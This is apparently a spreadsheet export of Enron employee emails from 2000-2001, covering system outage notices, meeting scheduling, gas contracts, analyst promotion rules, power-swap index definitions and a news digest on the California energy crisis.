FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
MESSAGING:      SEE ORIGINAL REPORT_x000D_
 _x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS:    SEE ORIGINAL REPORT _x000D_
 _x000D_
SITARA:   SEE ORIGINAL REPORT  _x000D_
 _x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: No Scheduled Outages_x000D_
_x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  No Scheduled Outages._x000D_
 _x000D_
SCHEDULED SYSTEM OUTAGES:   ESA_x000D_
_x000D_
                            SEE ORIGINAL REPORT _x000D_
_x000D_
                                               _x000D_
------------------------------------------------------------------------------_x000D_
-------------------------------------------------------_x000D_
FOR ASSISTANCE_x000D_
_x000D_
(713) 853-1411   Enron Resolution Center_x000D_
(713) 853-5536   Information Risk Management_x000D_
_x000D_
Specific Help:_x000D_
Unify On-Call      (713) 284-3757  [Pager]_x000D_
Sitara On-Call     (713) 288-0101  [Pager]_x000D_
RUS/GOPS/GeoTools/APRS   (713) 639-9726  [Pager]_x000D_
OSS/UA4/TARP    (713) 285-3165  [Pager]_x000D_
CPR      (713) 284-4175  [Pager]_x000D_
EDI Support      (713) 327-3893  [Pager]_x000D_
EES Help Desk     (713)853-1741 OR (888)853-9797</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 10:23:45 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Updated: Update on financings</t>
  </si>
  <si>
    <t xml:space="preserve">thanks_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Saunders, James  _x000D_
Sent:	Monday, November 26, 2001 12:14 PM_x000D_
To:	Geaccone, Tracy_x000D_
Subject:	FW: Updated: Update on financings_x000D_
_x000D_
kevin, left me a note saying he was unavailable today, so i rescheduled to wed (better fits your original plan)_x000D_
_x000D_
 -----Original Appointment-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Monday, November 26, 2001 12:11 PM_x000D_
To:	Saunders, James_x000D_
Subject:	Accepted: Updated: Update on financings_x000D_
When:	Wednesday, November 28, 2001 3:00 PM-5:00 PM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where:	eb21c2_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">6:30 at the earliest_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brian Hoskins@ENRON COMMUNICATIONS_x000D_
01/23/2001 10:03 AM_x000D_
To: Eric Bass/HOU/ECT@ECT@ENRON_x000D_
cc:  _x000D_
Subject: Re:   _x000D_
_x000D_
That's fine if we can do it early, say around 6:00 or 6:30.  The KY-AL game _x000D_
comes on at 8pm._x000D_
_x000D_
______________________x000D_
Brian T. Hoskins_x000D_
Enron Broadband Services_x000D_
713-853-0380 (office)_x000D_
713-412-3667 (mobile)_x000D_
713-646-5745 (fax)_x000D_
Brian_Hoskins@enron.net_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Eric Bass@ECT_x000D_
	01/23/01 10:03 AM_x000D_
		 _x000D_
		 To: Brian Hoskins/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
are we doing dinner tonite?_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 Jan 2001 07:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'edward.terry@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'liz.bellamy@enron.com', 'daren.farmer@enron.com'})</t>
  </si>
  <si>
    <t>Link to the HPL Scheduling Mailbox</t>
  </si>
  <si>
    <t xml:space="preserve">Please follow the instructions below._x000D_
_x000D_
Why:  A suggestion was made (by Carlos) to centralize transport nominations _x000D_
we receive by email.  We now have an email account set up: _x000D_
HPL.Scheduling@enron.com.  The group is to let our customers know this is _x000D_
where all nominations need to be sent.  This way, if people are out (or no _x000D_
longer with us), someone will be able to receive the nomination change.  I _x000D_
have also created folders for each shipper.  As each nomination is addressed, _x000D_
the file is to be moved to the folder for later reference.  If the file is _x000D_
still in the "inbox", it has not been addressed._x000D_
_x000D_
Any comments to this, I would greatly appreaciate feedback._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Edward Terry/HOU/ECT on 01/12/2001 03:27 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Enron Messaging Security @ ENRON                           01/09/2001 _x000D_
09:07 AM_x000D_
	_x000D_
_x000D_
To: HPL Scheduling Team_x000D_
cc:  _x000D_
Subject: Link to the HPL Scheduling Mailbox_x000D_
_x000D_
&lt;=&lt;=Double-click on the link and the mail box will be added to your Lotus _x000D_
Notes Workspace.  Each of you are editors of this mailbox.  The Internet _x000D_
address is hpl.scheduling@enron.com.   Just in case, the mailbox is located _x000D_
NAHOU-LNMAI20/Enron under the Mail folder._x000D_
_x000D_
The following have access:_x000D_
_x000D_
Michael Olsen/NA/Enron_x000D_
Tom Acton/Corp/Enron_x000D_
Mary Poorman/NA/Enron_x000D_
Eddie Janzen/NA/Enron_x000D_
Edward Terry/HOU/ECT_x000D_
Robert Cotten/HOU/ECT_x000D_
Aimee Lannou/HOU/ECT_x000D_
Jackie Young/HOU/ECT_x000D_
Carlos J Rodriguez/HOU/ECT_x000D_
Mark McCoy/Corp/Enron_x000D_
Sabrae Zajac/HOU/ECT_x000D_
_x000D_
Thanks,_x000D_
Sandy Rivas_x000D_
Enron Messaging Security_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 05:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>TRADE</t>
  </si>
  <si>
    <t>Can I pick up kimble anders of the chiefs???</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 13:50:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.gillespie@enron.com'})</t>
  </si>
  <si>
    <t>RE: VNG - TENN - Contract #47</t>
  </si>
  <si>
    <t>Chris, we lost this contract in November._x000D_
_x000D_
sg_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Fletcher, Brenda H.  _x000D_
Sent:	Tuesday, November 27, 2001 3:42 PM_x000D_
To:	Gillespie, Steve_x000D_
Cc:	Germany, Chris_x000D_
Subject:	VNG - TENN - Contract #47_x000D_
Importance:	High_x000D_
_x000D_
Was any capacity released under this contract in November?_x000D_
_x000D_
There is no deal number in Sitara with a demand fee for this contract for November forward.  Deal # 429424 has IM - Market East as the Agent._x000D_
If we need to pay a transport fee for this contract, then a new deal needs to be set up._x000D_
_x000D_
Please let me know as soon as possible._x000D_
_x000D_
Thanks,_x000D_
Brenda</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 09:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Amendment to the Gas Sales Terms and Conditions</t>
  </si>
  <si>
    <t>Glad to hear the dogs are ok.  But  I knew they would be, its you that has to _x000D_
make the real adjustment.    I took Ellen Wallumrod, (she is new on the _x000D_
confirm desk),  Allison McHenry / Marianne Castano (from EES I gave my _x000D_
invitation to them) and Genia.    I had trouble trying to find someone who _x000D_
wanted to go. _x000D_
_x000D_
Take care, enjoy being away. _x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
Legal Department_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490</t>
  </si>
  <si>
    <t>Don't forget to register!</t>
  </si>
  <si>
    <t>To register your Palm Computingc organizer electronically, you must have an _x000D_
Internet connection or a modem connected to your computer._x000D_
_x000D_
Or if you prefer, you can fill out and send the mail-in registration card _x000D_
included in your Palm Computing package._x000D_
_x000D_
Special rewards only for registered users:_x000D_
_x000D_
-FREE software programs *_x000D_
-FREE technical support **_x000D_
-Upgrade information_x000D_
-Important updates_x000D_
_x000D_
* For a complete list of free software, go to www.palm.com/eregdownload_x000D_
** Subject to change without notice</t>
  </si>
  <si>
    <t>Wed, 5 Jul 2000 00:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Program Changes</t>
  </si>
  <si>
    <t xml:space="preserve">i told you so!_x000D_
---------------------- Forwarded by Eric Bass/HOU/ECT on 07/05/2000 07:28 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Celeste Roberts_x000D_
06/30/2000 06:35 PM_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Program Changes  _x000D_
_x000D_
If you are currently an analyst in a commercial rotation, then you are _x000D_
eligible for promotion to a third year analyst.  After you have completed _x000D_
your third year, then you are eligible for promotion to a commercial _x000D_
associate.  These guidelines were effective on 6/1/2000.  The conversation _x000D_
that you and I had was prior to these changes.   Effective 6/1/2000, the _x000D_
Office of the Chairman has made it very clear that we are to adhere to these _x000D_
promotion guidelines going forward._x000D_
_x000D_
Celeste Roberts_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Eric Bass                           06/26/2000 02:39 PM_x000D_
	_x000D_
_x000D_
To: Celeste Roberts/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Program Changes_x000D_
_x000D_
Celeste,_x000D_
_x000D_
I am writing to get some clarification on how the recent changes to the _x000D_
program affect my eligibility for promotion.  At the end of last year you _x000D_
informed me that I was not eligible for promotion to associate until the mid _x000D_
year review (my 2 year anniversary).  It was my impression that the only _x000D_
reason that I was held back from promotion into the associate program was _x000D_
tenure.  Now, after reading the memo, it seems as if I will not be eligible _x000D_
for promotion to associate until I complete 3 years in the program._x000D_
_x000D_
I am wondering if I am still eligible for promotion to associate during this _x000D_
PRC?_x000D_
_x000D_
Thank you in advance for your prompt attention to this matter._x000D_
_x000D_
Eric Bass_x000D_
x3-0977_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Feb 2001 07:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.foster@enron.com', 'michael.spruiell@enron.com', 'daniel.kang@enron.com', 'judy.dyer@enron.com', 'jubran.whalan@enron.com', 'bill.iii@enron.com', 'neil.bresnan@enron.com'})</t>
  </si>
  <si>
    <t>Daily EES Sales 2/28</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry for the delay -_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 05:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jmyan@stanford.edu'})</t>
  </si>
  <si>
    <t>Re: Telephone Interview with The Enron Corp. Research Group</t>
  </si>
  <si>
    <t xml:space="preserve">Marshall:_x000D_
_x000D_
Thanks for responding so quickly.   I have scheduled the following intervie=_x000D_
w:_x000D_
_x000D_
Wednesday, December 6 - 1:00 PM Houston time.  It will last approximately_x000D_
1 hour.  We will call you at (605) 497-4045 unless otherwise instructed._x000D_
_x000D_
If you have any questions, please feel free to contact me at 713/853-5290._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Shirley Crenshaw_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Jingming 'Marshall' Yan" &lt;jmyan@stanford.edu&gt; on 11/28/2000 12:59:55 PM_x000D_
To: Shirley.Crenshaw@enron.com_x000D_
cc: Vince.J.Kaminski@enron.com=20_x000D_
Subject: Re: Telephone Interview with The Enron Corp. Research Group_x000D_
_x000D_
_x000D_
Ms. Crenshaw,_x000D_
_x000D_
 Thank you very much for the message. I am very interested in the_x000D_
opportunity to talk to personnel from the Research Group at Enron. Between_x000D_
the two days you suggest, I prefer Wednesday 12/6. Considering the_x000D_
two-hour time difference between California and Texas, 11:00 am Pacific_x000D_
time (1:00 pm your time) seems to be a good slot. However, I am open most_x000D_
of the day on 12/6 so if some other time slot is prefered on your end,_x000D_
please let me know._x000D_
_x000D_
 Thanks again. I look forward to talking to you and your_x000D_
colleagues._x000D_
_x000D_
Jingming_x000D_
_x000D_
On Tue, 28 Nov 2000 Shirley.Crenshaw@enron.com wrote:_x000D_
_x000D_
&gt; Good afternoon Jingming:_x000D_
&gt;_x000D_
&gt; Professor Wolak forwarded your resume to the Research Group, and_x000D_
&gt; they would like to conduct a telephone interview with you, sometime next_x000D_
&gt; week, at your convenience.  The best days would be Tuesday, 12/5 or_x000D_
&gt; Wednesday, 12/6._x000D_
&gt;_x000D_
&gt; Please let me know which day and what time would be best for you and_x000D_
&gt; they will call you.  Let me know the telephone number that you wish to be_x000D_
&gt; contacted at._x000D_
&gt;_x000D_
&gt; The interviewers would be:_x000D_
&gt;_x000D_
&gt; Vince Kaminski      Managing Director and Head of Research_x000D_
&gt; Vasant Shanbhogue   Vice President, Research_x000D_
&gt; Lance Cunningham    Manager, Research_x000D_
&gt; Alex Huang          Manager, Research_x000D_
&gt;_x000D_
&gt; Look forward to hearing from you._x000D_
&gt;_x000D_
&gt; Best regards,_x000D_
&gt;_x000D_
&gt; Shirley Crenshaw_x000D_
&gt; Administrative Coordinator_x000D_
&gt; Enron Research Group._x000D_
&gt; 713-853-5290_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
---------------------------------------------------------_x000D_
Jingming "Marshall" Yan  jmyan@leland.stanford.edu_x000D_
Department of Economics  (650)497-4045 (H)_x000D_
Stanford University   (650)725-8914 (O)_x000D_
Stanford, CA 94305  358C, Economics Bldg_x000D_
----------------------------------------------------------_x000D_
If one seeks to act virtuously and attain it, then what is_x000D_
there to repine about?   -- Confucius_x000D_
_x000D_
_?OO??OOo? ?T=15xO-??  -- =14??&lt;o=15 O"?&gt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Jun 2000 01:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'eric.saibi@enron.com', 'sara.shackleton@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>Re: PJM Prices US East Power Swap</t>
  </si>
  <si>
    <t xml:space="preserve">Fohot to include the Loadshape; sorry._x000D_
_x000D_
Loadshape:   PJM Interconnect Peak_x000D_
Abb:   Peak_x000D_
Day Coverage:  .4762_x000D_
Desc: The transaction is for on-peak ("Peak") hours on each Delivery Day _x000D_
beginning with the hour ending 0800 (7:00 am) and concluding with the hour _x000D_
ending 2300 (11:00 pm) Eastern Prevailing Time.  'Delivery Day' means a day _x000D_
during the term of the transaction that is a Monday, Tuesday, Wednesday, _x000D_
Thursday or Friday, excluding any day that is a NERC holiday._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Dale Neuner/HOU/ECT on 06/14/2000 08:28 _x000D_
AM ---------------------------_x000D_
Dale Neuner   06/14/2000 08:24 AM_x000D_
_x000D_
To: Leslie Hansen/HOU/ECT@ECT, Sara Shackleton/HOU/ECT@ECT, Eric _x000D_
Saibi/Corp/Enron@ENRON_x000D_
cc: Kenny Ha/HOU/ECT@ECT, Jennifer deBoisblanc Denny/HOU/ECT@ECT, Torrey _x000D_
Moorer/HOU/ECT@ECT, Tara Sweitzer/HOU/ECT@ECT _x000D_
Subject: Re: PJM Prices US East Power Swap  _x000D_
_x000D_
_x000D_
Legal/Commercial:_x000D_
_x000D_
Here is my suggestion for the PJM Index. I will use a PJM Peak Loadshape that _x000D_
mirrors the ISO NE and ISO NY Loadshape._x000D_
_x000D_
_x000D_
Kenny; et al:_x000D_
_x000D_
Please map in TEST and PROD_x000D_
_x000D_
Index:  PJM Interconnection_x000D_
Abb:  PJM InterC_x000D_
Sort Code: _x000D_
Desc:  The Floating Price during a Determination Period shall be the average _x000D_
of the hourly prices listed in the Index (in final, not estimate, form) for _x000D_
electricity delivered during Peak hours on each Delivery Day during the _x000D_
applicable Determination Period.  The Floating Price for each Determination _x000D_
Period shall be calculated utilizing the hourly clearing prices published by _x000D_
PJM Interconnection, LLC on its official web site currently located at _x000D_
http://www.pjm.com/pub/account/lmp/index.html, or any successor thereto, _x000D_
under the heading "PJM - Locational Marginal Pricing Files"  (the "Index")._x000D_
_x000D_
_x000D_
Dale_x000D_
3-9746_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Eric Saibi@ENRON_x000D_
06/13/2000 12:13 PM_x000D_
To: Dale Neuner/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: PJM Prices_x000D_
_x000D_
The appropriate address is ftp://www.pjm.com/pub/account/lmp/index.html_x000D_
_x000D_
This is the same as going to www.pjm.com, clicking on "Market &amp; System Data", _x000D_
and then clicking on "Daily Real Time LMP Data"._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 07:06:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Steve,_x000D_
_x000D_
_x000D_
I am sending you a variety of charts with prices and operational detail.  If _x000D_
you need to call with questions my home number is 713-463-8626._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
As far as recommendations, here is a short list:_x000D_
_x000D_
 1.  Examine LDC's incentive rate program.  Current methodology rewards sales _x000D_
above monthly index without enough consideration of future _x000D_
      replacement cost.  The result is that the LDC's sell gas that should be _x000D_
injected into storage when daily prices run above the monthly index._x000D_
                    This creates a shortage in later months._x000D_
_x000D_
 2.  California has the storage capacity and pipeline capacity to meet _x000D_
demand.  Investigate why it wasn't maximized operationally.  _x000D_
                      Specific questions should include:  _x000D_
_x000D_
  1.  Why in March '00-May '00  weren't total system receipts higher in order _x000D_
to fill storage?_x000D_
_x000D_
  2.  Why are there so many examples of OFO's on weekends that push away too _x000D_
much gas from Socal's system.  _x000D_
       I believe Socal gas does an extremely poor job of forecasting their _x000D_
own demand.  They repeatedly estimated they would receive       more gas than _x000D_
their injection capablity, but injected far less._x000D_
_x000D_
 3.  Similar to the power market,  there is too much benchmarking to short _x000D_
term prices.  Not enough forward hedging is done by the major _x000D_
                    LDCs.  By design the customers are short at a floating _x000D_
rate.  This market has been long historically.  It has been a buyers market _x000D_
and the _x000D_
     consumer has benefitted.  _x000D_
_x000D_
_x000D_
Call me if you need any more input._x000D_
_x000D_
_x000D_
Phillip</t>
  </si>
  <si>
    <t>Wed, 17 Oct 2001 04:29:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'katrina.burton@enron.com', 'sue.gaines@enron.com', 'j..kean@enron.com'})</t>
  </si>
  <si>
    <t>latest file</t>
  </si>
  <si>
    <t>Katrina,_x000D_
 _x000D_
Here is the latest in case you get there before me. I have reattached all slides to the master. I"ll be there soon._x000D_
 _x000D_
Sue</t>
  </si>
  <si>
    <t>Sat, 4 Nov 2000 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'christie.patrick@enron.com'})</t>
  </si>
  <si>
    <t>Re: Action Learning Project and Enron tour</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Vince!_x000D_
_x000D_
I'll call you Monday to further discuss this!  I'll be heading to Atlanta for _x000D_
a Forbes conference and meeting at Emory, but will call you at my first _x000D_
opportunity!_x000D_
_x000D_
Thanks for the information about the meeting with Bob!_x000D_
_x000D_
Thanks!_x000D_
_x000D_
--Christie._x000D_
_x000D_
---------------------- Forwarded by Christie Patrick/HOU/ECT on 11/04/2000 _x000D_
11:04 AM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
11/02/2000 01:55 PM_x000D_
To: Christie Patrick/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, vkaminski@aol.com _x000D_
Subject: Re: Action Learning Project and Enron tour  _x000D_
_x000D_
Christie,_x000D_
_x000D_
Let's meet to discuss this project. I need more information from you about it._x000D_
By the way, I shall meet Bob Westbrook on Wednesday to discuss unrelated _x000D_
issues._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Christie Patrick_x000D_
11/02/2000 12:33 AM_x000D_
To: cmiller@rice.edu, Cindy Derecskey/Corp/Enron@Enron, Michael B _x000D_
Rosen/HOU/ECT@ECT, Steven J Kean/NA/Enron@Enron, Vince J _x000D_
Kaminski/HOU/ECT@ECT, grwhit@rice.edu, westbro@rice.edu, Mark _x000D_
Palmer/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Action Learning Project and Enron tour_x000D_
_x000D_
Hi Carrie,_x000D_
_x000D_
It was great meeting with you and Dean Whitaker again last Friday, as well as _x000D_
Mr. Westbrook._x000D_
 As we discussed,  I have submitted the Action Learning Program materials to _x000D_
Vince Kaminski, our managing director of Risk analysis and Corporate _x000D_
Research.  I'll be following up with him, and his recommendations for project _x000D_
proposals next week._x000D_
  Also, I've discussed with our University Affairs team setting up the _x000D_
faculty tours--we're ready when you are!!  The sooner the better--I'd love to _x000D_
get these in pretty immediately, and in any event, before the reception at _x000D_
the end of the month.  I"ll have Cindy Derecskey in my group eMail you--she _x000D_
is prepared to set these tours up.  _x000D_
_x000D_
I look forward to continuing to develop the multiple potential dynamics of _x000D_
the Enron-Rice relationship!_x000D_
_x000D_
Thanks!_x000D_
_x000D_
--Christie._x000D_
_x000D_
ps:  Thanks so much for the Crystal Rice Owl--my participation as a judge in _x000D_
the Rice Invitational Case Competition was my pleasure indeed!_x000D_
---------------------- Forwarded by Christie Patrick/HOU/ECT on 11/02/2000 _x000D_
12:23 AM ---------------------------_x000D_
_x000D_
_x000D_
Carrie Miller &lt;cmiller@rice.edu&gt; on 11/01/2000 12:47:17 PM_x000D_
To: christie_patrick@enron.com_x000D_
cc: grwhit@rice.edu, westbro@rice.edu _x000D_
Subject: Action Learning Project and Enron tour_x000D_
_x000D_
_x000D_
Christie,_x000D_
_x000D_
I enjoyed visiting with you last week at the Jones School.  Thanks for_x000D_
taking time to come see us.  I wanted to follow up with you regarding the_x000D_
Action Learning Project program and Enron tour.  We hope to have Enron as_x000D_
part of the program in 2001.  Please let me know how I can help make this_x000D_
happen.  I look for the program to be full before the deadline of December_x000D_
1st.  Also, I am happy to help organize a group to tour Enron.  If you were_x000D_
to participate in the ALP program, January/February might be a good time to_x000D_
put something together with key faculty and the ALP team.  Let me know your_x000D_
thoughts._x000D_
_x000D_
Again, many thanks for your continued support of the Jones School.  I look_x000D_
forward to hearing from you soon._x000D_
_x000D_
Carrie_x000D_
_x000D_
======================================_x000D_
Carrie Chamberlin Miller_x000D_
Director of MBA Program_x000D_
Jesse H. Jones Graduate School of Management_x000D_
Rice University_x000D_
6100 Main Street, MS 531_x000D_
Houston, Texas 77005-1892_x000D_
Phone:  (713) 348-5260_x000D_
Fax:  (713) 348-5251_x000D_
E-mail:  cmiller@rice.edu_x000D_
http://www.ruf.rice.edu/~jgs/_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 29 Jan 2001 02:20:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: TDS Physical Positions</t>
  </si>
  <si>
    <t>Thanks VIc._x000D_
PL</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 09:33:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Entergy Tariff</t>
  </si>
  <si>
    <t xml:space="preserve">Schedules 1-6 have the ancillary services. _x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 04/02/2001 _x000D_
04:27 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bill Rust                           03/06/2001 04:11 PM_x000D_
	_x000D_
_x000D_
To: Christi L Nicolay/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Entergy Tariff_x000D_
_x000D_
Unfortunately, it only comes in html._x000D_
_x000D_
Bill Rust_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 02:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'california.group@enron.com'})</t>
  </si>
  <si>
    <t>Please see the following articles:_x000D_
_x000D_
Sac Bee, Fri, 4/6:  "Energy supply setback: Big generator can't be forced_x000D_
 to sell emergency power to the state, a U.S. court rules"_x000D_
_x000D_
Sac Bee, Fri, 4/6:  "In TV address, Davis embraces rate increase"_x000D_
_x000D_
Sac Bee, Fri, 4/6:  Governor's speech transcript_x000D_
_x000D_
Sac Bee, Fri, 4/6:  "Dan Walters: Davis finally acknowledges 'crisis,' back=_x000D_
s=20_x000D_
a rate increase"_x000D_
_x000D_
San Diego Union, Thurs, 4/5:  "Davis endorses rate hikes, defends handling =_x000D_
of=20_x000D_
energy crisis"_x000D_
_x000D_
San Diego Union, Thurs,4/5: "San Diego utility overspent $98 million,=20_x000D_
consumer group says "_x000D_
_x000D_
LA Times, Fri, 4/6:  "Davis Acknowledges Need for Rate Hike"_x000D_
_x000D_
LA Times, Fri, 4/6:  "Putting the Heat on 2-Fridge Households"_x000D_
_x000D_
SF Chron, Fri, 4/6:  "Davis Proposes Tiered Plan To Boost Rates=20_x000D_
Governor wants slightly lower increases than PUC adopted "_x000D_
_x000D_
SF Chron, Fri, 4/6:  "Legislature Pounds Out Conservation Package=20_x000D_
Davis expected to sign $1.1 billion measures"_x000D_
_x000D_
SF Chron, Fri, 4/6:  "At least 3.6 million families face possible power=20_x000D_
cutoffs"_x000D_
_x000D_
Mercury News, Fri, 4/6:  "Davis reveals plan, including rate hikes"_x000D_
_x000D_
Mercury News, Thurs, 4/5:  "Davis gives up fight against rate hikes"_x000D_
_x000D_
Mercury News, Thurs, 4/5:  "Western states share shortage of electricity"_x000D_
_x000D_
Mercury News, Fri, 4/6:  "Getting real on rates"                 (Editorial=_x000D_
)_x000D_
_x000D_
Orange County, Fri, 4/6:  "Davis: Rate hikes a must"_x000D_
_x000D_
Orange County, Fri, 4/6:  "Davis' power-crisis plan brings questions from=_x000D_
=20_x000D_
Wall Street"_x000D_
_x000D_
Orange County, Fri, 4/6:  "Davis pulls energy switch"_x000D_
_x000D_
Individual.com, Fri, 4/6:  "[B] PG&amp;E defaults on Los Alamos Energy power=20_x000D_
payment"_x000D_
_x000D_
Energy Insight, Fri, 4/6:  "Energy-related firms fare well on Fortune 500=_x000D_
=20_x000D_
list"          (Enron mentioned)_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------------------------------_x000D_
_x000D_
Energy supply setback: Big generator can't be forced to sell emergency powe=_x000D_
r=20_x000D_
to the state, a U.S. court rules._x000D_
By Denny Walsh and Carrie Peyton_x000D_
BEE STAFF WRITERS_x000D_
(Published April 6, 2001)=20_x000D_
In a development that does not bode well for California's energy supply, a=_x000D_
=20_x000D_
federal appellate court Thursday halted enforcement of a lower court order=_x000D_
=20_x000D_
that a big electricity generator must sell emergency power to the state=20_x000D_
without guarantee of payment.=20_x000D_
State energy officials said the ruling wouldn't have any immediate effect b=_x000D_
ut=20_x000D_
could precipitate a power emergency if the generator decided to take a plan=_x000D_
t=20_x000D_
off-line for maintenance.=20_x000D_
On March 21, citing "rolling blackouts (that have) darkened the California=_x000D_
=20_x000D_
landscape," U.S. District Judge Frank C. Damrell Jr. imposed an injunction=_x000D_
=20_x000D_
against Reliant Energy Services Inc., one of the nation's major generators.=_x000D_
=20_x000D_
Houston-based Reliant controls approximately 3,800 megawatts, or about 20=_x000D_
=20_x000D_
percent, of the gas-fired generation capacity in the state, and Damrell fou=_x000D_
nd=20_x000D_
that loss of that production "poses an imminent threat."=20_x000D_
But Thursday, a three-judge panel of the 9th U.S. Circuit Court of Appeals=_x000D_
=20_x000D_
granted an emergency stay of the injunction, saying Reliant has shown "a hi=_x000D_
gh=20_x000D_
likelihood of success on the merits" of its appeal.=20_x000D_
While not spelling it out, the panel apparently bases its finding on the=20_x000D_
question of the courts' jurisdiction over the energy market. The panel=20_x000D_
directed that a hearing on the appeal be scheduled for the second week in=_x000D_
=20_x000D_
July.=20_x000D_
The decision leaves California's electric grid more fragile, at least=20_x000D_
temporarily, according to the state Independent System Operator, which=20_x000D_
maintains and controls power transmissions.=20_x000D_
It gives the agency no immediate recourse if Reliant chooses to shut down a=_x000D_
ny=20_x000D_
of its plants for maintenance, said ISO Vice President Jim Detmers.=20_x000D_
"It's not going to change anything overnight, and it's not going to change=_x000D_
=20_x000D_
anything over the weekend," said Detmers. "But if Reliant decided on a=20_x000D_
unilateral action to take their units off for maintenance ... we definitely=_x000D_
=20_x000D_
could have a system emergency."=20_x000D_
Reliant officials, when told of the ruling, took a conciliatory tone but=20_x000D_
declined to specify their next move.=20_x000D_
"Reliant ... has pledged to keep the lights on in California," said company=_x000D_
=20_x000D_
lobbyist Marty Wilson, and "is still of a mind to want to cooperate."=20_x000D_
Without further comment, the appeals court judges cited a 1980 U.S. Distric=_x000D_
t=20_x000D_
Court decision. In that case, 14 cities sued Florida Power and Light Co.,=_x000D_
=20_x000D_
alleging that it was violating a number of laws in its sales of power and=_x000D_
=20_x000D_
production of electricity.=20_x000D_
The judge found, however, that the Federal Power Act reserves oversight of=_x000D_
=20_x000D_
interstate utilities exclusively to the Federal Energy Regulatory Commissio=_x000D_
n.=20_x000D_
He ruled that only the commission may bring an action involving energy sale=_x000D_
s=20_x000D_
into federal court -- unless it is a request to review a commission order,=_x000D_
=20_x000D_
and that goes directly to an appellate court.=20_x000D_
The lawsuit before Damrell was brought by the ISO to force Reliant and two=_x000D_
=20_x000D_
other generators to respond to ISO's emergency orders for power, even thoug=_x000D_
h=20_x000D_
the agency is buying on behalf of two retailers that are broke and hopeless=_x000D_
ly=20_x000D_
in debt.=20_x000D_
